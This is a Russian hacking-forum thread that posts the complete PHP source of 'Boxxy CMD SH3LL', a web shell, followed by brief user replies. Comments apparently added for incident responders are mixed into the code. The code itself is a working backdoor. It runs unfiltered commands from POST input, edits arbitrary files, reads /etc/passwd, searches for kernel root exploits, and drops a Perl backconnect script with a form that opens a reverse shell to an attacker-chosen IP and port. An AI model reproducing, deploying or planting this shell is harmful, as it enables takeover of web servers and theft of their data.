
Boxxy CMD SH3LL v1.002- Public release

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем bios, 12 янв 2013.

  1. TopicStarter Overlay
    bios

    bios

    [​IMG]

    Код:
    <?php
    // Access gate: when $auth is 1, every request must carry HTTP Basic
    // credentials whose MD5 digests equal $name and $pass below.
    $auth = 1;
     
    // Both digests are the same value. The author's trailing comments indicate the
    // shipped default is "boxxy" for login and password and that it is meant to be
    // changed. NOTE(review): for incident response, a recovered copy that still
    // carries these published values should be treated as reachable by anyone who
    // found it, not only by whoever placed it on the host.
    $name='21a3f41e963386efe3642db95f0efe24'; //(user login) //boxxy // ChangeME // MD5
    $pass='21a3f41e963386efe3642db95f0efe24'; //(user password) //boxxy // ChangeME // MD5
    /******************************************************************************************************/
    if($auth == 1) {
    // Rejects when no Basic username was sent, or when either unsalted MD5 digest
    // differs. The comparison uses !==, which is not a constant-time check.
    if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
      {
      // The realm string is sent in the 401 challenge, so it is visible in response
      // headers; it is a usable network-side indicator for this script.
      header('WWW-Authenticate: Basic realm="Boxxy CMD SH3LL"');
      header('HTTP/1.0 401 Unauthorized');
      exit("<center><b>Oh no you didn't!</b></center>");
      }
    }
    ?>
    <title>
    Boxxy CMD SH3LL
    </title>
    <STYLE type="text/css">
    input.input, textarea {
    font:Arial, sans-serif;
    color:red;
    }
    input.console, textarea {
    font:Arial, sans-serif;
    color:green;
    background:black;
    }
    </STYLE>
    <script>
    function derp()
    {
    ip = ip.value;
    port = port.value;
    derp = 'perl bc.pl ' + ip + port;
    }
    </script>
    <?php
    // Collects the request state used by the rest of the page.
    // $cmdsh3ll is the script's own file name and is reused as the action of every form.
    $cmdsh3ll = basename($_SERVER['PHP_SELF']);
    $serverip = $_SERVER['SERVER_ADDR'];
    // Spawns a process on every request; $pwd is not referenced again in the visible code.
    $pwd = exec('pwd');
    // POST fields read without any validation:
    //   x = command line, also used as a page selector ('exploit', 'generalinfo')
    //   a = 'edit' switch, b = 'backconnect' switch, f = file path for the editor
    // Detection note: the single-letter POST parameter names x/a/b/f/newd are what
    // appears in request bodies handled by this script.
    $value = $_POST["x"];
    $edit = $_POST["a"];
    $backconnect = $_POST["b"];
    $editme = $_POST["f"];
    //Perl backconnect code - Borrowed from i-47 shell
    // The backconnect branch base64-decodes and gzinflate()s this string before writing it to disk.
    // NOTE(review): the literal below does not look like base64 data; it appears to
    // have been replaced in this copy of the page, so the helper cannot be recovered from here.
    $backconnect_perl="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";
    // Loose comparison with NULL: true when x is absent or an empty string.
    if(!($value != NULL))
    {
    $value2 = "feed me commands!";
    }
    else
    {
    // Echoed back later as the value of the command input box.
    $value2 = $value;
    }
    ?>
    <body bgcolor="gray">
    <?php
    //exploit search
    // Builds two search URLs from the host's OS name and kernel release and, when
    // x == 'exploit', shows them in iframes and stops.
    // r and s are written as bare words rather than quoted strings.
    $Lversion = php_uname(r);
    $OSV = php_uname(s);
    // NOTE(review): eregi() was removed in PHP 7.0 and this call runs on every
    // request, before any branch is chosen. As posted, the script would therefore
    // stop here with a fatal error on PHP 7 or later; this helps when judging
    // whether a recovered copy could have executed on a given host.
    if(eregi('Linux',$OSV))
    {
    // Linux: keep the first six characters of the release string.
    $Lversion=substr($Lversion,0,6);
    $exploit="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$Lversion;
    $google="http://www.blackle.nl/?cx=partner-pub-3587004543063400%3As3fh9t2ic5k&cof=FORID%3A10&q=".$OSV.' '.$Lversion.' root exploit';
    }else{
    // Other systems: keep three characters and include the OS name in both queries.
    $Lversion=substr($Lversion,0,3);
    $exploit="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$OSV.' '.$Lversion;
    $google="http://www.blackle.nl/?cx=partner-pub-3587004543063400%3As3fh9t2ic5k&cof=FORID%3A10&q=".$OSV.' '.$Lversion.' root exploit';
    }
    if ($value == 'exploit') {
    // The iframes are fetched by the viewing browser, not by the server; the
    // host's OS and kernel string travel in the query string of those requests.
    echo '
    <form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="Welcome back!" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>
     
    <iframe src ="'.$google.'"
    height="45%"
    width="100%" frameborder="0">
    </iframe><br />
    <iframe src ="'.$exploit.'"
    height="45%"
    width="100%" frameborder="0">
    </iframe>';
    die();
    }
    ?>
    <?php
    //reserved For backconnect
    // Runs when POST b == 'backconnect': decodes $backconnect_perl and writes it to
    // disk as a Perl helper, then prints a form that composes a "perl <helper> <ip> <port>"
    // command line and posts it back as x.
    // Detection notes for responders:
    //   - a file named bc.pl in the script's working directory, or /tmp/bc.pl
    //   - a perl process started by the web server / PHP worker account
    //   - the form pre-fills the requester's address and port 1337
    // Several segments below open with the short tag "<?", which only parses when
    // short_open_tag is enabled.
    if ($backconnect == 'backconnect') {
                if(is_writable("."))
                {   
                    // Working directory is writable: the helper is dropped next to the script.
                    // The @ prefixes suppress errors, so a failed write is silent.
                    @$fh=fopen(getcwd()."/bc.pl",'w');
                    @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
                    @fclose($fh);
    echo('<form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="perl bc.pl" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>');
    ?>
    IP: <input type="text" id="iptxt" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/></td><br/>
    PORT: <input type="text" id="porttxt" name="port" value="1337"/></td><br />
     
    <form name="input" action="<?php echo($cmdsh3ll); ?>" method="post">
     
    <input type="hidden" value="" id="combined" name="x"/>
    <input type="submit" onclick="Combine()" value="Connect!">
     
    </form>
    <script>
    function Combine()
    {
        combined.value =  'perl bc.pl ' + iptxt.value + ' ' + porttxt.value;
    }
    </script>
    <?
                    echo "<div align='center'>You should use NetCat \"nc -l -n -v -p port\"! Before Clicking connect!</font></div></br>";
                }
                else
                {
                    // Fallback when the working directory is not writable: same helper, written to /tmp.
                    @$fh=fopen("/tmp/bc.pl","w");
                    @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
                    @fclose($fh);
    echo('<form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="perl /tmp/bc.pl" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>');
    ?>
    IP: <input type="text" id="iptxt" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/></td><br/>
    PORT: <input type="text" id="porttxt" name="port" value="1337"/></td><br />
     
    <form name="input" action="<?php echo($cmdsh3ll); ?>" method="post">
     
    <input type="hidden" value="" id="combined" name="x"/>
    <input type="submit" onclick="Combine()" value="Connect!">
     
    </form>
    <script>
    function Combine()
    {
        combined.value =  'perl /tmp/bc.pl ' + iptxt.value + ' ' + porttxt.value;
    }
    </script>
    <?
                    echo "<div align='center'>You should use NetCat \"nc -l -n -v -p port\"! Before Clicking connect!</font></div></br>";
                }
    ?>
    <?
    // Nothing after this branch is rendered.
    die();
    }
    ?>
    <?php
    //reserved For General info
    // Runs when x == 'generalinfo': prints host identity, the account the PHP
    // process runs as, selected PHP restrictions, and the result of an outbound
    // connection test, then stops.
    if ($value == 'generalinfo') {
    echo('<form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="Welcome back!" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>');
    $uname = php_uname();
    $soft = $_SERVER["SERVER_SOFTWARE"];
    // whoami and id are run as child processes; @ hides any error from exec().
    $curuser = @exec('whoami');
    echo("<center><b>General info</b></center><br /><br />");
    echo("<b>Host:</b> " . $_SERVER['SERVER_ADDR'] ."&nbsp//&nbsp". $_SERVER['SERVER_NAME']."<br>");
    echo("<b>Server software:</b> " . $soft . "<br>");
    echo("<b>Uname:</b> " . $uname . "<br>");
    echo("<b>Shell Directory:</b> " . getcwd() . "<br>");
    echo("<b>Current User:</b> " . $curuser . "<br>");
    echo("<b>ID:</b> " . @exec('id') . "<br>");
    // The three ini settings reported here (safe_mode, open_basedir, disable_functions)
    // are the hardening controls this page inspects; a non-empty value is shown in red.
    if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
    else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
    echo("\n<br>\n");
    if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ " . ini_get('open_basedir') . " ]");}
    else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
    echo("\n<br>\n");
    if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
    else{echo("<b>Disabled functions:</b> <font color='green'>None</font>");}
    echo("\n<br>\n");
    // mysql_connect is passed as a bare word rather than a quoted function name.
    if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font><br />");}
    else{echo("<b>MySQL:</b> <font color='red'>OFF</font><br />");}
    echo("<b>Open Sockets check // For Backconnects</b><br />");
    // Egress test: opens TCP port 80 to www.example.com with a 30-second timeout.
    // Detection note: an outbound connection from the web server to this host name,
    // carrying the fixed request built below, is an observable artefact of this page.
    $fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)<br />\n";
    echo("No, no <font color='red'>NETCAT</font> for you!");
    } else {
        $out = "GET / HTTP/1.1\r\n";
        $out .= "Host: www.example.com\r\n";
        $out .= "Connection: Close\r\n\r\n";
           
        // The request is written and the socket closed without reading a response;
        // only the success of the connection is used.
        fwrite($fp, $out);
        fclose($fp);
    echo("Yes you can use <font color='green'>NETCAT</font>");
    }
     
    die();
    }
    ?>
    <?php
    //Reserved For Edit
    // Runs when POST a == 'edit': a file editor driven entirely by request data.
    // The path comes from POST f and the replacement content from POST newd; no
    // path restriction is visible here, so the reach is whatever the PHP process
    // account can read or write. Responders should check other files writable by
    // that account for changes, not only the script itself.
    if ($edit == "edit") {
    echo '
    <form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="" name=""/>
    <input type="submit"  style="width: 100%" value="Go back"/>
    </form>';
     
    ?>
    <?php
    $filename = $editme;
    // Loose comparison with NULL: true when f is absent or an empty string.
    if(!($filename != NULL))
    {
    Echo("<h3>You forgot to put in a Filename! please try again!</h3>");
    }
    else
    {
      $newdata = $_POST['newd'];
    // Non-empty newd: the target is opened in 'w' mode, which truncates it, and
    // the submitted text is written after stripslashes().
    if ($newdata != '') {
    $fw = fopen($filename, 'w') or die('Could not open file!');
    $fb = fwrite($fw,stripslashes($newdata)) or die('Could not write 
    to file');
    fclose($fw);
    }
      // The file is then read back in full for display in the textarea.
      $fh = fopen($filename, "r") or die("Could not open file!");
      $data = fread($fh, filesize($filename)) or die("Could not read file!");
      fclose($fh);
    // $data is HTML-escaped below, but $filename is placed into the value attribute
    // unescaped. NOTE(review): $_SERVER[php_self] uses a bare, lower-case key,
    // unlike 'PHP_SELF' elsewhere in this script, so the action is probably empty.
    echo "<center>
    <form action='".$_SERVER[php_self]."' method= 'post'>
    <input type='hidden' class='input' value='edit' name='a'/>
    <input class='input' value='".$filename."' name='f' readonly='readonly' style='background-color: lightgray; width: 50%'/>
    <br />
    <textarea name='newd' cols='100%' rows='46'>".htmlspecialchars($data)."</textarea>
    <center>
    <input type='submit' value='Change' style='width: 100%'>
    </form>";
    }
    die();
    }
    ?>
     
    <?php
    //safemode
    // Sets $safemode and the HTML label $hsafemode shown in the status bar.
    // The first operand already covers any truthy ini value; the second is only
    // evaluated when the first is falsy.
    // NOTE(review): safe_mode was removed in PHP 5.4, so on later versions this
    // presumably always takes the OFF branch. Confirm against the host's PHP version.
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
    $safemode = TRUE;
    $hsafemode = "<FONT color='red'>ON (secure)</font>";
    }
    else {$safemode = FALSE; $hsafemode = "<font color='green'>OFF (not secure)</font>";}
    ?>
    <font color="white" style='BACKGROUND-COLOR: black'>//&nbsp;&nbsp;&nbsp;<b>Server ip:&nbsp;</b><font color='green'><?php echo($serverip); ?></font>&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp; <b>Safe-mode:</b>&nbsp;<?php echo $hsafemode; ?><?php echo("&nbsp;&nbsp;&nbsp; //&nbsp;&nbsp;&nbsp;<b>Current DIR:</b>&nbsp;" . exec('pwd') . "/" . basename($_SERVER['PHP_SELF'])); ?>
     
     
     
    </font>
    <!-- Buttons -->
    <center>
    <table>
    <tbody>
        <tr>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post">||<input type="hidden" class="input" value="ls -l" name="x"/>
            <input type="submit" value="list dir"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="ls -l /var/log" name="x"/>
            <input type="submit" value="list logs"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="ls -l /home" name="x"/>
            <input type="submit" value="list home"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="cat /etc/passwd" name="x"/>
            <input type="submit" value="show passwd"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="netstat -an | grep -i ESTABLISHED" name="x"/>
            <input type="submit" value="Open Connections"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="netstat -an | grep -i LISTEN" name="x"/>
            <input type="submit" value="Open Ports"/> || </form>
            <td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="cat /etc/hosts" name="x"/>
            <input type="submit" value="Hosts"/> || </form>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="ifconfig -a" name="x"/>
            <input type="submit" value="Ipconfig"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="uname -a" name="x"/>
            <input type="submit" value="uname -a"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="id" name="x"/>
            <input type="submit" value="ID"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="generalinfo" name="x"/>
            <input type="submit" value="Server info"/> || </form>
            </td> 
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="exploit" name="x"/>
            <input type="submit" value="Find Exploit"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="backconnect" name="b"/>
            <input type="submit" value="Backconnect"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="echo 'CMD SH3LL V1.002 Made By Boxxy' && echo '' && echo 'Thanks to Uitklapbare eekhoorn, Noxxie, Zer0spoof, and hackflag.org' && echo '' && echo 'Bugs:' && echo 'Ip config is not working on all servers! / still finding a fix!' && echo ''  && echo 'Please Notify me of any other bugs!' && echo '' && echo 'thanks for using my cmd shell' " name="x"/>
            <input type="submit" value="credits"/> || </form>
            </td>
      </tr>
    </tbody>
    </table>
    </center>
    <!-- /buttons -->
     
    <!-- CMD line -->
    <table>
    <tr>
    <td style="width: 80%">
    <form action="<?php echo($cmdsh3ll); ?>" method="post">
    <input type="text" class="input" value="<?php echo $value2;?>" name="x" style="width: 100%"/><br />
    <input type="submit" style="width: 100%" />
    </form>
    </td>
            <td style="width: 20%">
          <form action="" method="post">
            <input type="hidden" value="edit" name="a">
            <input class="input" value="Filename - if not in same dir inc full path" name="f" style="width: 100%"/><br />
            <input type="submit" value="Edit" style="width: 100%"/></form>
            </td>
            <td>
    </tr>
    </table>
    <!-- /CMD line -->
     
    <font color="green">
    <?php
    //CMD Parser
    // Default action, reached on every request that no earlier branch ended with
    // die(): the raw POST x value is appended to a fixed "id && " prefix and passed
    // to exec() with no filtering.
    echo "<center><textarea rows='40' cols='100' class='console'>";
    // $results receives the output lines. Without x, the string passed is only the prefix.
    // Detection note: because of the fixed prefix, process or audit telemetry would
    // show the PHP worker starting a shell whose command line begins with "id && ".
    exec('id && ' . $value, $results);
    // Starting at index 1 drops the first output line, i.e. the line printed by id,
    // so only the submitted command's output is displayed. Each line is HTML-escaped.
    foreach(array_slice($results,1,count($results)) as $file) {
        echo htmlspecialchars($file) . "\n";
    }
    echo "</textarea></center>";
    ?>
    </font>
    <center><font color="white" style='BACKGROUND-COLOR: black'>//&nbsp;CMD SH3LL V1.002 Made by Boxxy // </font></center>
    </body>
    </html>
     
  2. ImDeniil

    ImDeniil Гость

    Ну хотя бы описание, что ли.
     
  3. TopicStarter Overlay
    bios

    bios

    Что описание-то? Шелл как шелл :confused:
     
  4. ImDeniil

    ImDeniil Гость

    Я шелл впервые вижу :D
     
  5. }{OTT@BY4

    }{OTT@BY4 Гость

    "Показать пароли" - сомнительная ф-ция:)
     
